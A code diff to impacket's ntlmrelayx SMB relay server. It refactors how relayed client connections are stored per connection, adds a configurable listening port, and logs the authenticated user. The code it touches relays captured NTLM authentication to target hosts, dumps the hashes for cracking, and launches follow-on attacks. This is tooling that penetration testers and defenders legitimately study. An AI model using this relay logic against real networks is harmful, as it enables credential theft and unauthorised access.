@@ -33,6 +33,8 @@ from impacket.spnego import ASN1_AID, MechTypes, ASN1_SUPPORTED_MECH
 from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections
 from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor
 from impacket.smbserver import getFileTime
+from impacket.dcerpc.v5 import transport, scmr
+from impacket.dcerpc.v5.rpcrt import DCERPCException
 
 class SMBRelayServer(Thread):
     def __init__(self,config):
@@ -78,7 +80,12 @@ class SMBRelayServer(Thread):
             SMBSERVER.address_family = socket.AF_INET6
 
         # changed to dereference configuration interfaceIp
-        self.server = SMBSERVER((config.interfaceIp,445), config_parser = smbConfig)
+        if self.config.listeningPort:
+            smbport = self.config.listeningPort
+        else:
+            smbport = 445
+
+        self.server = SMBSERVER((config.interfaceIp,smbport), config_parser = smbConfig)
         logging.getLogger('impacket.smbserver').setLevel(logging.CRITICAL)
 
         self.server.processConfigFile()
@@ -103,17 +110,8 @@ class SMBRelayServer(Thread):
 
         self.target = self.targetprocessor.getTarget()
 
-        #############################################################
-        # SMBRelay
-        # Get the data for all connections
-        smbData = smbServer.getConnectionData('SMBRelay', False)
-        if smbData.has_key(self.target):
-            # Remove the previous connection and use the last one
-            smbClient = smbData[self.target]['SMBClient']
-            del smbClient
-            del smbData[self.target]
-
-        LOG.info("SMBD: Received connection from %s, attacking target %s://%s" % (connData['ClientIP'], self.target.scheme, self.target.netloc))
+        LOG.info("SMBD-%s: Received connection from %s, attacking target %s://%s" % (connId, connData['ClientIP'], self.target.scheme,
+                                                                                  self.target.netloc))
 
         try:
             if self.config.mode.upper() == 'REFLECTION':
@@ -129,10 +127,8 @@ class SMBRelayServer(Thread):
             LOG.error("Connection against target %s://%s FAILED: %s" % (self.target.scheme, self.target.netloc, str(e)))
             self.targetprocessor.logTarget(self.target)
         else:
-            smbData[self.target] = {}
-            smbData[self.target]['SMBClient'] = client
+            connData['SMBClient'] = client
             connData['EncryptionKey'] = client.getStandardSecurityChallenge()
-            smbServer.setConnectionData('SMBRelay', smbData)
             smbServer.setConnectionData(connId, connData)
 
         respPacket = smb3.SMB2Packet()
@@ -195,10 +191,6 @@ class SMBRelayServer(Thread):
 
     def SmbSessionSetup(self, connId, smbServer, recvPacket):
         connData = smbServer.getConnectionData(connId, checkStatus = False)
-        #############################################################
-        # SMBRelay
-        smbData = smbServer.getConnectionData('SMBRelay', False)
-        #############################################################
 
         respSMBCommand = smb3.SMB2SessionSetup_Response()
         sessionSetupData = smb3.SMB2SessionSetup(recvPacket['Data'])
@@ -255,7 +247,7 @@ class SMBRelayServer(Thread):
             #############################################################
             # SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
             # Let's send it to the target server and send the answer back to the client.
-            client = smbData[self.target]['SMBClient']
+            client = connData['SMBClient']
             try:
                 challengeMessage = self.do_ntlm_negotiate(client, token)
             except Exception, e:
@@ -293,7 +285,7 @@ class SMBRelayServer(Thread):
             #############################################################
             # SMBRelay: Ok, so now the have the Auth token, let's send it
             # back to the target system and hope for the best.
-            client = smbData[self.target]['SMBClient']
+            client = connData['SMBClient']
             authenticateMessage = ntlm.NTLMAuthChallengeResponse()
             authenticateMessage.fromString(token)
             if authenticateMessage['user_name'] != '':
@@ -324,7 +316,7 @@ class SMBRelayServer(Thread):
                 LOG.info("Authenticating against %s://%s as %s\%s SUCCEED" % (
                 self.target.scheme, self.target.netloc, authenticateMessage['domain_name'], authenticateMessage['user_name']))
                 # Log this target as processed for this client
-                self.targetprocessor.logTarget(self.target, True)
+                self.targetprocessor.logTarget(self.target, True, self.authUser)
 
                 ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'],
                                                     authenticateMessage['user_name'],
@@ -336,8 +328,6 @@ class SMBRelayServer(Thread):
                     writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
                                           self.server.getJTRdumpPath())
 
-                del (smbData[self.target])
-
                 connData['Authenticated'] = True
 
                 self.do_attack(client)
@@ -371,18 +361,8 @@ class SMBRelayServer(Thread):
         # except for relying on the targetprocessor selecting the same target unless a relay was already done
         self.target = self.targetprocessor.getTarget()
 
-        #############################################################
-        # SMBRelay
-        # Get the data for all connections
-        smbData = smbServer.getConnectionData('SMBRelay', False)
-
-        if smbData.has_key(self.target):
-            # Remove the previous connection and use the last one
-            smbClient = smbData[self.target]['SMBClient']
-            del smbClient
-            del smbData[self.target]
-
-        LOG.info("SMBD: Received connection from %s, attacking target %s://%s" % (connData['ClientIP'], self.target.scheme, self.target.netloc))
+        LOG.info("SMBD-%s: Received connection from %s, attacking target %s://%s" % (connId, connData['ClientIP'],
+                                                                                     self.target.scheme, self.target.netloc))
 
         try:
             if recvPacket['Flags2'] & smb.SMB.FLAGS2_EXTENDED_SECURITY == 0:
@@ -402,10 +382,8 @@ class SMBRelayServer(Thread):
             LOG.error("Connection against target %s://%s FAILED: %s" % (self.target.scheme, self.target.netloc, str(e)))
             self.targetprocessor.logTarget(self.target)
         else:
-            smbData[self.target] = {}
-            smbData[self.target]['SMBClient'] = client
+            connData['SMBClient'] = client
             connData['EncryptionKey'] = client.getStandardSecurityChallenge()
-            smbServer.setConnectionData('SMBRelay', smbData)
             smbServer.setConnectionData(connId, connData)
 
         return self.origSmbComNegotiate(connId, smbServer, SMBCommand, recvPacket)
@@ -414,10 +392,6 @@ class SMBRelayServer(Thread):
     def SmbSessionSetupAndX(self, connId, smbServer, SMBCommand, recvPacket):
 
         connData = smbServer.getConnectionData(connId, checkStatus = False)
-        #############################################################
-        # SMBRelay
-        smbData = smbServer.getConnectionData('SMBRelay', False)
-        #############################################################
 
         respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)
 
@@ -454,7 +428,7 @@ class SMBRelayServer(Thread):
                 #############################################################
                 # SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
                 # Let's send it to the target server and send the answer back to the client.
-                client = smbData[self.target]['SMBClient']
+                client = connData['SMBClient']
                 try:
                     challengeMessage = self.do_ntlm_negotiate(client,token)
                 except Exception, e:
@@ -487,7 +461,7 @@ class SMBRelayServer(Thread):
                 #############################################################
                 # SMBRelay: Ok, so now the have the Auth token, let's send it
                 # back to the target system and hope for the best.
-                client = smbData[self.target]['SMBClient']
+                client = connData['SMBClient']
                 authenticateMessage = ntlm.NTLMAuthChallengeResponse()
                 authenticateMessage.fromString(token)
 
@@ -532,7 +506,7 @@ class SMBRelayServer(Thread):
                     self.target.scheme, self.target.netloc, authenticateMessage['domain_name'], authenticateMessage['user_name']))
 
                     # Log this target as processed for this client
-                    self.targetprocessor.logTarget(self.target, True)
+                    self.targetprocessor.logTarget(self.target, True, self.authUser)
 
                     ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'],
                                                         authenticateMessage['user_name'],
@@ -544,8 +518,6 @@ class SMBRelayServer(Thread):
                         writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
                                               self.server.getJTRdumpPath())
 
-                    del (smbData[self.target])
-
                     self.do_attack(client)
                     # Now continue with the server
                 #############################################################
@@ -577,7 +549,7 @@ class SMBRelayServer(Thread):
             sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength']
             sessionSetupData.fromString(SMBCommand['Data'])
 
-            client = smbData[self.target]['SMBClient']
+            client = connData['SMBClient']
             _, errorCode = client.sendStandardSecurityAuth(sessionSetupData)
 
             if errorCode != STATUS_SUCCESS:
@@ -610,7 +582,7 @@ class SMBRelayServer(Thread):
                 self.authUser = ('%s/%s' % (sessionSetupData['PrimaryDomain'], sessionSetupData['Account'])).upper()
 
                 # Log this target as processed for this client
-                self.targetprocessor.logTarget(self.target, True)
+                self.targetprocessor.logTarget(self.target, True, self.authUser)
 
                 ntlm_hash_data = outputToJohnFormat('', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'],
                                                     sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'])
@@ -620,8 +592,6 @@ class SMBRelayServer(Thread):
                     writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
                                           self.server.getJTRdumpPath())
 
-                del (smbData[self.target])
-
                 self.do_attack(client)
                 # Now continue with the server
             #############################################################
@@ -634,10 +604,6 @@ class SMBRelayServer(Thread):
         # From now on, the client can ask for other commands
         connData['Authenticated'] = True
 
-        #############################################################
-        # SMBRelay
-        smbServer.setConnectionData('SMBRelay', smbData)
-        #############################################################
         smbServer.setConnectionData(connId, connData)
 
         return [respSMBCommand], None, errorCode
@@ -691,3 +657,4 @@ class SMBRelayServer(Thread):
     def run(self):
         LOG.info("Setting up SMB Server")
         self._start()
+
